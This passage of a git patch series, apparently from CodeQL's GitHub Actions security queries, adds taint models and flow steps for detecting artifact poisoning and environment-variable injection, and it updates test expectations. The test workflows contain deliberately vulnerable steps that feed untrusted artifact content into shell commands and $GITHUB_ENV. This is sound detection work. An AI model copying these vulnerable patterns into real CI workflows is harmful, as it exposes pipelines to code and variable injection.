-j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | @@ -42,5 +40,7 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 41c465dcc27c..70eb169860e6 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,9 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index b4a099672a4f..4431d865417d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -9,16 +9,12 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | @@ -40,9 +36,7 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | -| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | -| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 8289bf97b9da5faae3fc46125c6516e1939e96f2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 11:10:01 +0200 Subject: [PATCH 406/707] feat(models): Add support for artifact to step output --- .../codeql/actions/dataflow/ExternalFlow.qll | 9 ++++- ql/lib/ext/manual/read-file-actions.model.yml | 33 +++++++++++++++++++ .../.github/workflows/artifactpoisoning5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 6 ++++ .../CWE-094/CodeInjectionMedium.expected | 5 +++ 5 files changed, 53 insertions(+), 2 deletions(-) create mode 100644 ql/lib/ext/manual/read-file-actions.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 1d1b0c6a7199..9ddba387b512 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -1,6 +1,7 @@ +private import actions private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow -private import actions +private import codeql.actions.security.ArtifactPoisoningQuery /** * MaD sources @@ -91,6 +92,12 @@ predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::Conte or input.trim().matches("input.%") and pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + exists(UntrustedArtifactDownloadStep download | + pred.asExpr() = download and + download.getAFollowingStep() = uses + ) ) and succ.asExpr() = uses ) diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml new file mode 100644 index 000000000000..1b9bd745a65a --- /dev/null +++ b/ql/lib/ext/manual/read-file-actions.model.yml @@ -0,0 +1,33 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["juliangruber/read-file-action", "*", "artifact", "output.content", "taint", "manual"] + - ["bfren/read-file", "*", "artifact", "output.contents", "taint", "manual"] + - ["igorskyflyer/action-readfile", "*", "artifact", "output.content", "taint", "manual"] + - ["komorebitech/read-files-action", "*", "artifact", "output.content", "taint", "manual"] + - ["jaywcjlove/github-action-read-file", "*", "artifact", "output.content", "taint", "manual"] + - ["andstor/file-reader-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["Reedyuk/read-properties", "*", "artifact", "output.value", "taint", "manual"] + - ["browniebroke/read-nvmrc-action", "*", "artifact", "output.node_version", "taint", "manual"] + - ["jbutcher5/read-yaml", "*", "artifact", "output.data", "taint", "manual"] + - ["christian-draeger/read-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["traversals-analytics-and-intelligence/file-reader-action", "*", "artifact", "output.content", "taint", "manual"] + - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["satya-500/read-file-github-action", "*", "artifact", "output.contents", "taint", "manual"] + - ["guibranco/github-file-reader-action-v2", "*", "artifact", "output.contents", "taint", "manual"] + - ["gagle/package-version", "*", "artifact", "output.version", "taint", "manual"] + - ["ActionsTools/read-json-action", "*", "artifact", "output.*", "taint", "manual"] + - ["madhead/read-java-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["rexdefuror/read-package-json", "*", "artifact", "env.*", "taint", "manual"] + - ["BrycensRanch/read-properties-action", "*", "artifact", "output.*", "taint", "manual"] + - ["kurt-code/gha-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["SebRollen/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["simonblund/version-reader", "*", "artifact", "output.version", "taint", "manual"] + - ["mindsers/changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["nichmor/minimal-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml index 633c45661e59..4a2b9b50eb67 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml @@ -19,5 +19,5 @@ jobs: with: path: ./artifact.txt - name: Use artifact - run: echo ${{ steps.artifact.outputs.contents }} + run: echo ${{ steps.artifact.outputs.content }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 370241c7ac00..2e0f79da4a00 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -9,6 +9,8 @@ edges | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:43:25 +0200 Subject: [PATCH 407/707] feat(models): Add dotenv models Envvar-injection sinks --- ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml | 6 ++++++ ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/akefirad_loadenv-action.model.yml | 7 +++++++ ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml | 6 ++++++ ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml | 6 ++++++ .../manual/luizfelipelaviola_parse-plain-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/read-file-actions.model.yml | 4 ++++ ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 6 ++++++ 8 files changed, 47 insertions(+) create mode 100644 ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml create mode 100644 ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml create mode 100644 ql/lib/ext/manual/akefirad_loadenv-action.model.yml create mode 100644 ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml create mode 100644 ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml create mode 100644 ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml create mode 100644 ql/lib/ext/manual/xom9ikk_dotenv.model.yml diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml new file mode 100644 index 000000000000..ad7fb8a538cc --- /dev/null +++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml new file mode 100644 index 000000000000..cf23452f7a99 --- /dev/null +++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml new file mode 100644 index 000000000000..8f14138168c7 --- /dev/null +++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"] + diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml new file mode 100644 index 000000000000..264c3f7b2424 --- /dev/null +++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml new file mode 100644 index 000000000000..f00774d1c4ad --- /dev/null +++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml new file mode 100644 index 000000000000..c7474549fcb5 --- /dev/null +++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml index 1b9bd745a65a..3d92eaef263a 100644 --- a/ql/lib/ext/manual/read-file-actions.model.yml +++ b/ql/lib/ext/manual/read-file-actions.model.yml @@ -31,3 +31,7 @@ extensions: - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"] - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"] - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["romanlamsal/dotenv-concat", "*", "artifact", "output.*", "taint", "manual"] + - ["sammcj/dotenv-output-action", "*", "artifact", "output.*", "taint", "manual"] + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "output.*", "taint", "manual"] + - ["duskmoon314/action-load-env", "*", "artifact", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml new file mode 100644 index 000000000000..bfbd4e2f7294 --- /dev/null +++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"] From 5785a21d5675e6fba491b6104c6402649cb99496 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:44:25 +0200 Subject: [PATCH 408/707] feat(queries): Env-var injection Enable Uses sinks for envvar injection --- .../codeql/actions/dataflow/ExternalFlow.qll | 20 +++++++++++-------- .../actions/security/EnvVarInjectionQuery.qll | 13 ++++++++++++ .../CWE-077/EnvVarInjectionCritical.ql | 6 +++++- .../Security/CWE-077/EnvVarInjectionMedium.ql | 6 +++++- 4 files changed, 35 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 9ddba387b512..2914dac5f0a6 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -110,18 +110,22 @@ predicate madSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and - ( - if input.trim().matches("env.%") - then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) - else - if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) - else none() - ) and + // version check ( if version.trim() = "*" then uses.getVersion() = any(string v) else uses.getVersion() = version.trim() + ) and + // pred provenance + ( + input.trim().matches("env.%") and + sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + sink.asExpr() = uses ) ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index f5a3b5f89a8e..8dba1a21c908 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -45,6 +45,19 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { } } +/** + * Holds if a 3rd party action declares an environment variable with contents from an untrusted file. + * e.g. + *- name: Load .env file + * uses: aarcangeli/load-dotenv@v1.0.0 + * with: + * path: 'backend/new' + * filenames: | + * .env + * .env.test + * quiet: false + * if-file-not-found: error + */ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 320feb4e1335..89e1ddd3cc2d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink @@ -25,7 +26,10 @@ where not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index bccb61ae6ea6..70c05fc1c95d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink @@ -25,7 +26,10 @@ where not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", From e0a075da57ce4dd67a658251af54731f04a3d0e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:06 +0200 Subject: [PATCH 409/707] feat(dataflow): Flow through bash assigments on artifact to GH env/output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 82 +++++++++++++++++--- 1 file changed, 72 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 5e624798d69a..3caf80b7ca8e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -156,24 +156,72 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" + */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) and + ( + // A file is read and its content is assigned to an env var + // - run: | + // foo=$(> "$GITHUB_ENV" + exists(string var_name, string line, string assignment_regexp, string file_read | + run.getScript().splitAt("\n") = line and + assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and + var_name = line.regexpCapture(assignment_regexp, 1) and + file_read = line.regexpCapture(assignment_regexp, 2) and + outputsPartialFileContent(file_read) and + envToRunExpr(var_name, run, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + ) + or + // A file is read and its content is assigned to an output + // - run: echo "foo=$(> "$GITHUB_ENV" + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and + outputsPartialFileContent(value) + ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and @@ -185,7 +233,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF /** * A download artifact step followed by a step that may use downloaded artifacts. */ -predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { +predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(UntrustedArtifactDownloadStep download, Run run | pred.asExpr() = download and succ.asExpr() = run.getScriptScalar() and @@ -193,6 +241,18 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { ) } +/** + * A download artifact step followed by a envvar-injection uses step . + */ +predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UntrustedArtifactDownloadStep download, Uses uses | + madSink(succ, "envvar-injection") and + pred.asExpr() = download and + succ.asExpr() = uses and + download.getAFollowingStep() = uses + ) +} + /** * A read of the _files field of the dorny/paths-filter action. */ @@ -254,7 +314,9 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) or - artifactDownloadToUseStep(node1, node2) or + artifactDownloadToRunStep(node1, node2) or + artifactDownloadToUsesStep(node1, node2) or + // 3rd party actions dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or From a1787596d242dc4c20392ff4805f25e932e563e2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:19 +0200 Subject: [PATCH 410/707] feat(tests): Update tests --- ql/test/library-tests/test.expected | 31 +++++++++++++++++++ .../CWE-077/.github/workflows/test7.yml | 25 +++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 +++ .../CWE-077/EnvVarInjectionMedium.expected | 3 ++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 +++++++++ 6 files changed, 93 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 62b04344f392..0139efb0f83d 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1083,10 +1083,16 @@ sources | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | | apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | | 